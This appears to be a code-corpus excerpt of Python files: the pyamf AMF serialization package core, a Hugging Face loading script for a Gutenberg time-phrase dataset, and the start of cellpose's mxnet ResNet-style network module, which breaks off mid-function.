raise TypeError("Expecting class object or ClassAlias from loader")
mod_class = alias.split('.')
if mod_class:
module = '.'.join(mod_class[:-1])
klass = mod_class[-1]
try:
module = util.get_module(module)
except (ImportError, AttributeError):
pass
else:
klass = getattr(module, klass)
if isinstance(klass, python.class_types):
return register_class(klass, alias)
elif isinstance(klass, ClassAlias):
CLASS_CACHE[klass.alias] = klass
CLASS_CACHE[klass.klass] = klass
return klass.klass
else:
raise TypeError("Expecting class type or ClassAlias from loader")
# All available methods for finding the class have been exhausted
raise UnknownClassAlias("Unknown alias for %r" % (alias,))
def decode(stream, *args, **kwargs):
"""
A generator function to decode a datastream.
@param stream: AMF data to be decoded.
@type stream: byte data.
@kwarg encoding: AMF encoding type. One of L{ENCODING_TYPES}.
@return: A generator that will decode each element in the stream.
"""
encoding = kwargs.pop('encoding', DEFAULT_ENCODING)
decoder = get_decoder(encoding, stream, *args, **kwargs)
return decoder
def encode(*args, **kwargs):
"""
A helper function to encode an element.
@param args: The python data to be encoded.
@kwarg encoding: AMF encoding type. One of L{ENCODING_TYPES}.
@return: A L{util.BufferedByteStream} object that contains the data.
"""
encoding = kwargs.pop('encoding', DEFAULT_ENCODING)
encoder = get_encoder(encoding, **kwargs)
[encoder.writeElement(el) for el in args]
stream = encoder.stream
stream.seek(0)
return stream
def get_decoder(encoding, *args, **kwargs):
"""
Returns a L{codec.Decoder} capable of decoding AMF[C{encoding}] streams.
@raise ValueError: Unknown C{encoding}.
"""
def _get_decoder_class():
if encoding == AMF0:
try:
from cpyamf import amf0
except ImportError:
from pyamf import amf0
return amf0.Decoder
elif encoding == AMF3:
try:
from cpyamf import amf3
except ImportError:
from pyamf import amf3
return amf3.Decoder
raise ValueError("Unknown encoding %r" % (encoding,))
return _get_decoder_class()(*args, **kwargs)
def get_encoder(encoding, *args, **kwargs):
"""
Returns a L{codec.Encoder} capable of encoding AMF[C{encoding}] streams.
@raise ValueError: Unknown C{encoding}.
"""
def _get_encoder_class():
if encoding == AMF0:
try:
from cpyamf import amf0
except ImportError:
from pyamf import amf0
return amf0.Encoder
elif encoding == AMF3:
try:
from cpyamf import amf3
except ImportError:
from pyamf import amf3
return amf3.Encoder
raise ValueError("Unknown encoding %r" % (encoding,))
return _get_encoder_class()(*args, **kwargs)
def blaze_loader(alias):
"""
Loader for BlazeDS framework compatibility classes, specifically
implementing C{ISmallMessage}.
@see: U{BlazeDS<http://opensource.adobe.com/wiki/display/blazeds/BlazeDS>}
@since: 0.5
"""
if alias not in ['DSC', 'DSK']:
return
import pyamf.flex.messaging
return CLASS_CACHE[alias]
def flex_loader(alias):
"""
Loader for L{Flex<pyamf.flex>} framework compatibility classes.
@raise UnknownClassAlias: Trying to load an unknown Flex compatibility class.
"""
if not alias.startswith('flex.'):
return
try:
if alias.startswith('flex.messaging.messages'):
import pyamf.flex.messaging
elif alias.startswith('flex.messaging.io'):
import pyamf.flex
elif alias.startswith('flex.data.messages'):
import pyamf.flex.data
return CLASS_CACHE[alias]
except KeyError:
raise UnknownClassAlias(alias)
def add_type(type_, func=None):
"""
Adds a custom type to L{TYPE_MAP}. A custom type allows fine grain control
of what to encode to an AMF data stream.
@raise TypeError: Unable to add as a custom type (expected a class or callable).
@raise KeyError: Type already exists.
@see: L{get_type} and L{remove_type}
"""
def _check_type(type_):
if not (isinstance(type_, python.class_types) or
hasattr(type_, '__call__')):
            raise TypeError('Unable to add %r as a custom type (expected a '
                'class or callable)' % (type_,))
if isinstance(type_, list):
type_ = tuple(type_)
if type_ in TYPE_MAP:
raise KeyError('Type %r already exists' % (type_,))
if isinstance(type_, types.TupleType):
for x in type_:
_check_type(x)
else:
_check_type(type_)
TYPE_MAP[type_] = func
def get_type(type_):
"""
Gets the declaration for the corresponding custom type.
@raise KeyError: Unknown type.
@see: L{add_type} and L{remove_type}
"""
if isinstance(type_, list):
type_ = tuple(type_)
for k, v in TYPE_MAP.iteritems():
if k == type_:
return v
raise KeyError("Unknown type %r" % (type_,))
def remove_type(type_):
"""
Removes the custom type declaration.
@return: Custom type declaration.
@see: L{add_type} and L{get_type}
"""
declaration = get_type(type_)
del TYPE_MAP[type_]
return declaration
def add_error_class(klass, code):
"""
Maps an exception class to a string code. Used to map remoting C{onStatus}
objects to an exception class so that an exception can be built to
represent that error.
An example::
>>> class AuthenticationError(Exception):
... pass
...
>>> pyamf.add_error_class(AuthenticationError, 'Auth.Failed')
>>> print pyamf.ERROR_CLASS_MAP
{'TypeError': <type 'exceptions.TypeError'>, 'IndexError': <type 'exceptions.IndexError'>,
'Auth.Failed': <class '__main__.AuthenticationError'>, 'KeyError': <type 'exceptions.KeyError'>,
'NameError': <type 'exceptions.NameError'>, 'LookupError': <type 'exceptions.LookupError'>}
@param klass: Exception class
@param code: Exception code
@type code: C{str}
@see: L{remove_error_class}
"""
if not isinstance(code, python.str_types):
code = code.decode('utf-8')
if not isinstance(klass, python.class_types):
raise TypeError("klass must be a class type")
mro = inspect.getmro(klass)
if not Exception in mro:
raise TypeError(
'Error classes must subclass the __builtin__.Exception class')
if code in ERROR_CLASS_MAP:
raise ValueError('Code %s is already registered' % (code,))
ERROR_CLASS_MAP[code] = klass
def remove_error_class(klass):
"""
Removes a class from the L{ERROR_CLASS_MAP}.
An example::
>>> class AuthenticationError(Exception):
... pass
...
>>> pyamf.add_error_class(AuthenticationError, 'Auth.Failed')
>>> pyamf.remove_error_class(AuthenticationError)
@see: L{add_error_class}
"""
if isinstance(klass, python.str_types):
if klass not in ERROR_CLASS_MAP:
raise ValueError('Code %s is not registered' % (klass,))
elif isinstance(klass, python.class_types):
classes = ERROR_CLASS_MAP.values()
if klass not in classes:
raise ValueError('Class %s is not registered' % (klass,))
klass = ERROR_CLASS_MAP.keys()[classes.index(klass)]
else:
raise TypeError("Invalid type, expected class or string")
del ERROR_CLASS_MAP[klass]
def register_alias_type(klass, *args):
"""
This function allows you to map subclasses of L{ClassAlias} to classes
listed in C{args}.
When an object is read/written from/to the AMF stream, a paired L{ClassAlias}
instance is created (or reused), based on the Python class of that object.
L{ClassAlias} provides important metadata for the class and can also control
how the equivalent Python object is created, how the attributes are applied
etc.
Use this function if you need to do something non-standard.
@since: 0.4
@see:
- L{pyamf.adapters._google_appengine_ext_db.DataStoreClassAlias} for a
good example.
- L{unregister_alias_type}
@raise RuntimeError: alias is already registered
@raise TypeError: Value supplied to C{klass} is not a class
@raise ValueError:
- New aliases must subclass L{pyamf.ClassAlias}
- At least one type must be supplied
"""
def check_type_registered(arg):
for k, v in ALIAS_TYPES.iteritems():
for kl in v:
if arg is kl:
raise RuntimeError('%r is already registered under %r' % (
arg, k))
if not isinstance(klass, python.class_types):
raise TypeError('klass must be class')
if not issubclass(klass, ClassAlias):
raise ValueError('New aliases must subclass pyamf.ClassAlias')
if len(args) == 0:
raise ValueError('At least one type must be supplied')
if len(args) == 1 and hasattr(args[0], '__call__'):
c = args[0]
check_type_registered(c)
else:
for arg in args:
if not isinstance(arg, python.class_types):
raise TypeError('%r must be class' % (arg,))
check_type_registered(arg)
ALIAS_TYPES[klass] = args
for k, v in CLASS_CACHE.copy().iteritems():
new_alias = util.get_class_alias(v.klass)
if new_alias is klass:
meta = util.get_class_meta(v.klass)
meta['alias'] = v.alias
alias_klass = klass(v.klass, **meta)
CLASS_CACHE[k] = alias_klass
CLASS_CACHE[v.klass] = alias_klass
def unregister_alias_type(klass):
"""
Removes the klass from the L{ALIAS_TYPES} register.
@see: L{register_alias_type}
"""
return ALIAS_TYPES.pop(klass, None)
def register_package(module=None, package=None, separator='.', ignore=[],
strict=True):
"""
This is a helper function that takes the concept of Actionscript packages
and registers all the classes in the supplied Python module under that
    package. It auto-aliases all classes in C{module} based on the parent
C{package}.
@param module: The Python module that will contain all the classes to
auto alias.
@type module: C{module} or C{dict}
@param package: The base package name. e.g. 'com.example.app'. If this
is C{None} then the value is inferred from C{module.__name__}.
@type package: C{string} or C{None}
@param separator: The separator used to append to C{package} to form the
complete alias.
@param ignore: To give fine grain control over what gets aliased and what
doesn't, supply a list of classes that you B{do not} want to be aliased.
@type ignore: C{iterable}
@param strict: Whether only classes that originate from C{module} will be
registered.
@return: A dict of all the classes that were registered and their respective
L{ClassAlias} counterparts.
@since: 0.5
@raise TypeError: Cannot get a list of classes from C{module}
"""
if isinstance(module, python.str_types):
if module == '':
raise TypeError('Cannot get list of classes from %r' % (module,))
package = module
module = None
if module is None:
import inspect
prev_frame = inspect.stack()[1][0]
module = prev_frame.f_locals
if type(module) is dict:
has = lambda x: x in module
get = module.__getitem__
elif type(module) is list:
has = lambda x: x in module
get = module.__getitem__
strict = False
else:
has = lambda x: hasattr(module, x)
get = lambda x: getattr(module, x)
if package is None:
if has('__name__'):
package = get('__name__')
else:
raise TypeError('Cannot get list of classes from %r' % (module,))
if has('__all__'):
keys = get('__all__')
elif hasattr(module, '__dict__'):
keys = module.__dict__.keys()
elif hasattr(module, 'keys'):
keys = module.keys()
elif isinstance(module, list):
keys = range(len(module))
else:
raise TypeError('Cannot get list of classes from %r' % (module,))
def check_attr(attr):
if not isinstance(attr, python.class_types):
return False
if attr.__name__ in ignore:
return False
try:
if strict and attr.__module__ != get('__name__'):
return False
except AttributeError:
return False
return True
# gotta love python
classes = filter(check_attr, [get(x) for x in keys])
registered = {}
for klass in classes:
alias = '%s%s%s' % (package, separator, klass.__name__)
registered[klass] = register_class(klass, alias)
return registered
def set_default_etree(etree):
"""
    Sets the default interface that will be called upon to both de/serialise XML
entities. This means providing both C{tostring} and C{fromstring} functions.
For testing purposes, will return the previous value for this (if any).
"""
from pyamf import xml
return xml.set_default_interface(etree)
#: Set up some standard class registrations and class loaders.
register_class(ASObject)
register_class_loader(flex_loader)
register_class_loader(blaze_loader)
register_alias_type(TypedObjectClassAlias, TypedObject)
register_alias_type(ErrorAlias, Exception)
register_adapters()
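Putting the registration and codec helpers above together, a round trip looks roughly like the following sketch (the class and alias names are invented for illustration, and it simply mirrors the docstring examples rather than adding new API):

import pyamf

class User(object):
    pass

# Map the class to an ActionScript alias, then round-trip an instance through AMF3.
pyamf.register_class(User, 'com.example.User')

u = User()
u.name = 'spam'

stream = pyamf.encode(u, encoding=pyamf.AMF3)
for decoded in pyamf.decode(stream.getvalue(), encoding=pyamf.AMF3):
    print decoded.name  # 'spam'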
| 28.256773
| 104
| 0.644393
|
import types
import inspect
from pyamf import util, _version
from pyamf.adapters import register_adapters
from pyamf import python
from pyamf.alias import ClassAlias, UnknownClassAlias
__all__ = [
'register_class',
'register_class_loader',
'encode',
'decode',
'__version__',
'version'
]
__version__ = version = _version.version
CLASS_CACHE = {}
CLASS_LOADERS = set()
TYPE_MAP = {}
ERROR_CLASS_MAP = {
TypeError.__name__: TypeError,
KeyError.__name__: KeyError,
LookupError.__name__: LookupError,
IndexError.__name__: IndexError,
NameError.__name__: NameError,
ValueError.__name__: ValueError
}
ALIAS_TYPES = {}
AMF0 = 0
AMF3 = 3
ENCODING_TYPES = (AMF0, AMF3)
DEFAULT_ENCODING = AMF3
class UndefinedType(object):
def __repr__(self):
return 'pyamf.Undefined'
Undefined = UndefinedType()
class BaseError(Exception):
class DecodeError(BaseError):
class EOStream(BaseError):
class ReferenceError(BaseError):
class EncodeError(BaseError):
class ASObject(dict):
class __amf__:
dynamic = True
def __getattr__(self, k):
try:
return self[k]
except KeyError:
raise AttributeError('Unknown attribute \'%s\'' % (k,))
def __setattr__(self, k, v):
self[k] = v
def __repr__(self):
return dict.__repr__(self)
def __hash__(self):
return id(self)
class MixedArray(dict):
class TypedObject(dict):
def __init__(self, alias):
dict.__init__(self)
self.alias = alias
def __readamf__(self, o):
raise DecodeError('Unable to decode an externalised stream with '
'class alias \'%s\'.\n\nA class alias was found and because '
'strict mode is False an attempt was made to decode the object '
'automatically. To decode this stream, a registered class with '
'the alias and a corresponding __readamf__ method will be '
'required.' % (self.alias,))
def __writeamf__(self, o):
raise EncodeError('Unable to encode an externalised stream with '
'class alias \'%s\'.\n\nA class alias was found and because '
'strict mode is False an attempt was made to encode the object '
'automatically. To encode this stream, a registered class with '
'the alias and a corresponding __writeamf__ method will be '
'required.' % (self.alias,))
class TypedObjectClassAlias(ClassAlias):
klass = TypedObject
def __init__(self, *args, **kwargs):
ClassAlias.__init__(self, self.klass, kwargs.pop('alias', args[0]))
def createInstance(self, codec=None):
return self.klass(self.alias)
def checkClass(kls, klass):
pass
class ErrorAlias(ClassAlias):
def getCustomProperties(self):
self.exclude_attrs.update(['args'])
def getEncodableAttributes(self, obj, **kwargs):
attrs = ClassAlias.getEncodableAttributes(self, obj, **kwargs)
attrs['message'] = str(obj)
attrs['name'] = obj.__class__.__name__
return attrs
def register_class(klass, alias=None):
meta = util.get_class_meta(klass)
if alias is not None:
meta['alias'] = alias
alias_klass = util.get_class_alias(klass) or ClassAlias
x = alias_klass(klass, defer=True, **meta)
if not x.anonymous:
CLASS_CACHE[x.alias] = x
CLASS_CACHE[klass] = x
return x
def unregister_class(alias):
try:
x = CLASS_CACHE[alias]
except KeyError:
raise UnknownClassAlias('Unknown alias %r' % (alias,))
if not x.anonymous:
del CLASS_CACHE[x.alias]
del CLASS_CACHE[x.klass]
return x
def get_class_alias(klass_or_alias):
if isinstance(klass_or_alias, python.str_types):
try:
return CLASS_CACHE[klass_or_alias]
except KeyError:
return load_class(klass_or_alias)
try:
return CLASS_CACHE[klass_or_alias]
except KeyError:
raise UnknownClassAlias('Unknown alias for %r' % (klass_or_alias,))
def register_class_loader(loader):
if not hasattr(loader, '__call__'):
raise TypeError("loader must be callable")
CLASS_LOADERS.update([loader])
def unregister_class_loader(loader):
try:
CLASS_LOADERS.remove(loader)
except KeyError:
raise LookupError("loader not found")
def load_class(alias):
try:
return CLASS_CACHE[alias]
except KeyError:
pass
for loader in CLASS_LOADERS:
klass = loader(alias)
if klass is None:
continue
if isinstance(klass, python.class_types):
return register_class(klass, alias)
elif isinstance(klass, ClassAlias):
CLASS_CACHE[klass.alias] = klass
CLASS_CACHE[klass.klass] = klass
return klass
raise TypeError("Expecting class object or ClassAlias from loader")
mod_class = alias.split('.')
if mod_class:
module = '.'.join(mod_class[:-1])
klass = mod_class[-1]
try:
module = util.get_module(module)
except (ImportError, AttributeError):
pass
else:
klass = getattr(module, klass)
if isinstance(klass, python.class_types):
return register_class(klass, alias)
elif isinstance(klass, ClassAlias):
CLASS_CACHE[klass.alias] = klass
CLASS_CACHE[klass.klass] = klass
return klass.klass
else:
raise TypeError("Expecting class type or ClassAlias from loader")
raise UnknownClassAlias("Unknown alias for %r" % (alias,))
def decode(stream, *args, **kwargs):
encoding = kwargs.pop('encoding', DEFAULT_ENCODING)
decoder = get_decoder(encoding, stream, *args, **kwargs)
return decoder
def encode(*args, **kwargs):
encoding = kwargs.pop('encoding', DEFAULT_ENCODING)
encoder = get_encoder(encoding, **kwargs)
[encoder.writeElement(el) for el in args]
stream = encoder.stream
stream.seek(0)
return stream
def get_decoder(encoding, *args, **kwargs):
def _get_decoder_class():
if encoding == AMF0:
try:
from cpyamf import amf0
except ImportError:
from pyamf import amf0
return amf0.Decoder
elif encoding == AMF3:
try:
from cpyamf import amf3
except ImportError:
from pyamf import amf3
return amf3.Decoder
raise ValueError("Unknown encoding %r" % (encoding,))
return _get_decoder_class()(*args, **kwargs)
def get_encoder(encoding, *args, **kwargs):
def _get_encoder_class():
if encoding == AMF0:
try:
from cpyamf import amf0
except ImportError:
from pyamf import amf0
return amf0.Encoder
elif encoding == AMF3:
try:
from cpyamf import amf3
except ImportError:
from pyamf import amf3
return amf3.Encoder
raise ValueError("Unknown encoding %r" % (encoding,))
return _get_encoder_class()(*args, **kwargs)
def blaze_loader(alias):
if alias not in ['DSC', 'DSK']:
return
import pyamf.flex.messaging
return CLASS_CACHE[alias]
def flex_loader(alias):
if not alias.startswith('flex.'):
return
try:
if alias.startswith('flex.messaging.messages'):
import pyamf.flex.messaging
elif alias.startswith('flex.messaging.io'):
import pyamf.flex
elif alias.startswith('flex.data.messages'):
import pyamf.flex.data
return CLASS_CACHE[alias]
except KeyError:
raise UnknownClassAlias(alias)
def add_type(type_, func=None):
def _check_type(type_):
if not (isinstance(type_, python.class_types) or
hasattr(type_, '__call__')):
            raise TypeError('Unable to add %r as a custom type (expected a '
                'class or callable)' % (type_,))
if isinstance(type_, list):
type_ = tuple(type_)
if type_ in TYPE_MAP:
raise KeyError('Type %r already exists' % (type_,))
if isinstance(type_, types.TupleType):
for x in type_:
_check_type(x)
else:
_check_type(type_)
TYPE_MAP[type_] = func
def get_type(type_):
if isinstance(type_, list):
type_ = tuple(type_)
for k, v in TYPE_MAP.iteritems():
if k == type_:
return v
raise KeyError("Unknown type %r" % (type_,))
def remove_type(type_):
declaration = get_type(type_)
del TYPE_MAP[type_]
return declaration
def add_error_class(klass, code):
if not isinstance(code, python.str_types):
code = code.decode('utf-8')
if not isinstance(klass, python.class_types):
raise TypeError("klass must be a class type")
mro = inspect.getmro(klass)
if not Exception in mro:
raise TypeError(
'Error classes must subclass the __builtin__.Exception class')
if code in ERROR_CLASS_MAP:
raise ValueError('Code %s is already registered' % (code,))
ERROR_CLASS_MAP[code] = klass
def remove_error_class(klass):
if isinstance(klass, python.str_types):
if klass not in ERROR_CLASS_MAP:
raise ValueError('Code %s is not registered' % (klass,))
elif isinstance(klass, python.class_types):
classes = ERROR_CLASS_MAP.values()
if klass not in classes:
raise ValueError('Class %s is not registered' % (klass,))
klass = ERROR_CLASS_MAP.keys()[classes.index(klass)]
else:
raise TypeError("Invalid type, expected class or string")
del ERROR_CLASS_MAP[klass]
def register_alias_type(klass, *args):
def check_type_registered(arg):
for k, v in ALIAS_TYPES.iteritems():
for kl in v:
if arg is kl:
raise RuntimeError('%r is already registered under %r' % (
arg, k))
if not isinstance(klass, python.class_types):
raise TypeError('klass must be class')
if not issubclass(klass, ClassAlias):
raise ValueError('New aliases must subclass pyamf.ClassAlias')
if len(args) == 0:
raise ValueError('At least one type must be supplied')
if len(args) == 1 and hasattr(args[0], '__call__'):
c = args[0]
check_type_registered(c)
else:
for arg in args:
if not isinstance(arg, python.class_types):
raise TypeError('%r must be class' % (arg,))
check_type_registered(arg)
ALIAS_TYPES[klass] = args
for k, v in CLASS_CACHE.copy().iteritems():
new_alias = util.get_class_alias(v.klass)
if new_alias is klass:
meta = util.get_class_meta(v.klass)
meta['alias'] = v.alias
alias_klass = klass(v.klass, **meta)
CLASS_CACHE[k] = alias_klass
CLASS_CACHE[v.klass] = alias_klass
def unregister_alias_type(klass):
return ALIAS_TYPES.pop(klass, None)
def register_package(module=None, package=None, separator='.', ignore=[],
strict=True):
if isinstance(module, python.str_types):
if module == '':
raise TypeError('Cannot get list of classes from %r' % (module,))
package = module
module = None
if module is None:
import inspect
prev_frame = inspect.stack()[1][0]
module = prev_frame.f_locals
if type(module) is dict:
has = lambda x: x in module
get = module.__getitem__
elif type(module) is list:
has = lambda x: x in module
get = module.__getitem__
strict = False
else:
has = lambda x: hasattr(module, x)
get = lambda x: getattr(module, x)
if package is None:
if has('__name__'):
package = get('__name__')
else:
raise TypeError('Cannot get list of classes from %r' % (module,))
if has('__all__'):
keys = get('__all__')
elif hasattr(module, '__dict__'):
keys = module.__dict__.keys()
elif hasattr(module, 'keys'):
keys = module.keys()
elif isinstance(module, list):
keys = range(len(module))
else:
raise TypeError('Cannot get list of classes from %r' % (module,))
def check_attr(attr):
if not isinstance(attr, python.class_types):
return False
if attr.__name__ in ignore:
return False
try:
if strict and attr.__module__ != get('__name__'):
return False
except AttributeError:
return False
return True
classes = filter(check_attr, [get(x) for x in keys])
registered = {}
for klass in classes:
alias = '%s%s%s' % (package, separator, klass.__name__)
registered[klass] = register_class(klass, alias)
return registered
def set_default_etree(etree):
from pyamf import xml
return xml.set_default_interface(etree)
register_class(ASObject)
register_class_loader(flex_loader)
register_class_loader(blaze_loader)
register_alias_type(TypedObjectClassAlias, TypedObject)
register_alias_type(ErrorAlias, Exception)
register_adapters()
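# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# The public surface defined above comes down to register_class() plus the encode()/decode()
# helpers. A minimal round trip, assuming the full pyamf package (the amf0/amf3 codecs and
# pyamf.util byte streams) is importable, and using a made-up Point class and alias name,
# could look roughly like this:
if __name__ == '__main__':
    class Point(object):
        def __init__(self, x=0, y=0):
            self.x = x
            self.y = y

    # Map the class to an AMF alias so both peers agree on the wire-level type name.
    register_class(Point, 'example.Point')

    # encode() returns the encoder's byte stream rewound to position 0; iterating the
    # object returned by decode() yields the elements read back from that stream.
    encoded = encode(Point(1, 2), encoding=AMF3)
    decoded = list(decode(encoded))
    print(decoded)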
| true
| true
|
1c42115399dbe0144a26fa8dc6aa87e3e16e5769
| 4,117
|
py
|
Python
|
datasets/gutenberg_time/gutenberg_time.py
|
WojciechKusa/datasets
|
1406a04c3e911cec2680d8bc513653e0cafcaaa4
|
[
"Apache-2.0"
] | 10,608
|
2020-09-10T15:47:50.000Z
|
2022-03-31T22:51:47.000Z
|
datasets/gutenberg_time/gutenberg_time.py
|
realChainLife/datasets
|
98261e8b0b7be4dbaaa71ae188b950f7fbe51bbd
|
[
"Apache-2.0"
] | 2,396
|
2020-09-10T14:55:31.000Z
|
2022-03-31T19:41:04.000Z
|
datasets/gutenberg_time/gutenberg_time.py
|
realChainLife/datasets
|
98261e8b0b7be4dbaaa71ae188b950f7fbe51bbd
|
[
"Apache-2.0"
] | 1,530
|
2020-09-10T21:43:10.000Z
|
2022-03-31T01:59:12.000Z
|
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Recognizing the flow of time in a story is a crucial aspect of understanding it. Prior work related to time has primarily focused on identifying temporal expressions or relative sequencing of events, but here we propose computationally annotating each line of a book with wall clock times, even in the absence of explicit time-descriptive phrases. To do so, we construct a data set of hourly time phrases from 52,183 fictional books."""
import csv
import os
import datasets
_CITATION = """\
@misc{kim2020time,
title={What time is it? Temporal Analysis of Novels},
author={Allen Kim and Charuta Pethe and Steven Skiena},
year={2020},
eprint={2011.04124},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
"""
_DESCRIPTION = """\
A clean data resource containing all explicit time references in a dataset of 52,183 novels whose full text is available via Project Gutenberg.
"""
_HOMEPAGE = "https://github.com/allenkim/what-time-is-it"
_LICENSE = "[More Information needed]"
# The HuggingFace dataset library don't host the datasets but only point to the original files
# This can be an arbitrary nested dict/list of URLs (see below in `_split_generators` method)
_URLs = {
"gutenberg": "https://github.com/TevenLeScao/what-time-is-it/blob/master/gutenberg_time_phrases.zip?raw=true",
}
class GutenbergTime(datasets.GeneratorBasedBuilder):
"""Novel extracts with time-of-the-day information"""
VERSION = datasets.Version("1.1.3")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name="gutenberg", description="Data pulled from the Gutenberg project"),
]
def _info(self):
features = datasets.Features(
{
"guten_id": datasets.Value("string"),
"hour_reference": datasets.Value("string"),
"time_phrase": datasets.Value("string"),
"is_ambiguous": datasets.Value("bool_"),
"time_pos_start": datasets.Value("int64"),
"time_pos_end": datasets.Value("int64"),
"tok_context": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
my_urls = _URLs[self.config.name]
data = dl_manager.download_and_extract(my_urls)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"filepath": os.path.join(data, "gutenberg_time_phrases.csv"),
"split": "train",
},
)
]
def _generate_examples(self, filepath, split):
with open(filepath, encoding="utf8") as f:
data = csv.reader(f)
next(data)
for id_, row in enumerate(data):
yield id_, {
"guten_id": row[0],
"hour_reference": row[1],
"time_phrase": row[2],
"is_ambiguous": row[3],
"time_pos_start": row[4],
"time_pos_end": row[5],
"tok_context": row[6],
}
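# --- Illustrative usage sketch (editor's addition, not part of the original script) ---
# The builder above registers a single "gutenberg" configuration with one train split whose
# rows carry the seven features declared in _info(). Consuming it through the datasets
# library (assuming the script is reachable under the "gutenberg_time" dataset name, or that
# a local path to this file is passed instead) might look like this:
if __name__ == "__main__":
    dataset = datasets.load_dataset("gutenberg_time", "gutenberg", split="train")
    for example in dataset.select(range(3)):
        print(example["guten_id"], example["hour_reference"], example["time_phrase"])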
| 37.770642
| 439
| 0.632499
|
import csv
import os
import datasets
_CITATION = """\
@misc{kim2020time,
title={What time is it? Temporal Analysis of Novels},
author={Allen Kim and Charuta Pethe and Steven Skiena},
year={2020},
eprint={2011.04124},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
"""
_DESCRIPTION = """\
A clean data resource containing all explicit time references in a dataset of 52,183 novels whose full text is available via Project Gutenberg.
"""
_HOMEPAGE = "https://github.com/allenkim/what-time-is-it"
_LICENSE = "[More Information needed]"
# This can be an arbitrary nested dict/list of URLs (see below in `_split_generators` method)
_URLs = {
"gutenberg": "https://github.com/TevenLeScao/what-time-is-it/blob/master/gutenberg_time_phrases.zip?raw=true",
}
class GutenbergTime(datasets.GeneratorBasedBuilder):
VERSION = datasets.Version("1.1.3")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name="gutenberg", description="Data pulled from the Gutenberg project"),
]
def _info(self):
features = datasets.Features(
{
"guten_id": datasets.Value("string"),
"hour_reference": datasets.Value("string"),
"time_phrase": datasets.Value("string"),
"is_ambiguous": datasets.Value("bool_"),
"time_pos_start": datasets.Value("int64"),
"time_pos_end": datasets.Value("int64"),
"tok_context": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
my_urls = _URLs[self.config.name]
data = dl_manager.download_and_extract(my_urls)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"filepath": os.path.join(data, "gutenberg_time_phrases.csv"),
"split": "train",
},
)
]
def _generate_examples(self, filepath, split):
with open(filepath, encoding="utf8") as f:
data = csv.reader(f)
next(data)
for id_, row in enumerate(data):
yield id_, {
"guten_id": row[0],
"hour_reference": row[1],
"time_phrase": row[2],
"is_ambiguous": row[3],
"time_pos_start": row[4],
"time_pos_end": row[5],
"tok_context": row[6],
}
| true
| true
|
1c4211be12ac569a922d65f12f4891262c862e23
| 6,936
|
py
|
Python
|
cellpose/resnet_style.py
|
YinuoJin/cellpose
|
eb8df70f295ac8465633f468d487aee1dd13a181
|
[
"BSD-3-Clause"
] | 504
|
2020-02-04T06:42:53.000Z
|
2022-03-31T06:13:11.000Z
|
cellpose/resnet_style.py
|
YinuoJin/cellpose
|
eb8df70f295ac8465633f468d487aee1dd13a181
|
[
"BSD-3-Clause"
] | 457
|
2020-02-04T20:53:06.000Z
|
2022-03-30T07:30:32.000Z
|
cellpose/resnet_style.py
|
YinuoJin/cellpose
|
eb8df70f295ac8465633f468d487aee1dd13a181
|
[
"BSD-3-Clause"
] | 208
|
2020-02-04T15:50:20.000Z
|
2022-03-31T14:57:48.000Z
|
from mxnet import gluon, nd
from mxnet.gluon import nn
import numpy as np
nfeat = 128
sz = [3, 3, 3, 3, 3]
sz2 = [3, 3, 3, 3, 3]
szf = [1]
def total_variation_loss(x):
""" regularize convolutional masks (not currently in use) """
a = nd.square(x[:, :, :-1, :-1] - x[:, :, 1:, :-1])
b = nd.square(x[:, :, :-1, :-1] - x[:, :, :-1, 1:])
return nd.sum(nd.mean(nd.power(a + b, 1.25), axis=(2,3)))
def convbatchrelu(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
nn.BatchNorm(axis=1),
nn.Activation('relu'),
)
return conv
def batchconv(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.BatchNorm(axis=1),
nn.Activation('relu'),
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
)
return conv
def batchconv0(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.BatchNorm(axis=1),
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
)
return conv
class resdown(nn.HybridBlock):
def __init__(self, nconv, **kwargs):
super(resdown, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
for t in range(4):
self.conv.add( batchconv(nconv, 3))
self.proj = batchconv0(nconv, 1)
def hybrid_forward(self, F, x):
x = self.proj(x) + self.conv[1](self.conv[0](x))
x = x + self.conv[3](self.conv[2](x))
return x
class convdown(nn.HybridBlock):
def __init__(self, nconv, **kwargs):
super(convdown, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
for t in range(2):
self.conv.add(batchconv(nconv, 3))
def hybrid_forward(self, F, x):
x = self.conv[0](x)
x = self.conv[1](x)
return x
class downsample(nn.HybridBlock):
def __init__(self, nbase, residual_on=True, **kwargs):
super(downsample, self).__init__(**kwargs)
with self.name_scope():
self.down = nn.HybridSequential()
for n in range(len(nbase)):
if residual_on:
self.down.add(resdown(nbase[n]))
else:
self.down.add(convdown(nbase[n]))
def hybrid_forward(self, F, x):
xd = []
for n in range(len(self.down)):
if n>0:
y = F.Pooling(xd[n-1], kernel=(2,2), stride=(2,2), pool_type='max')
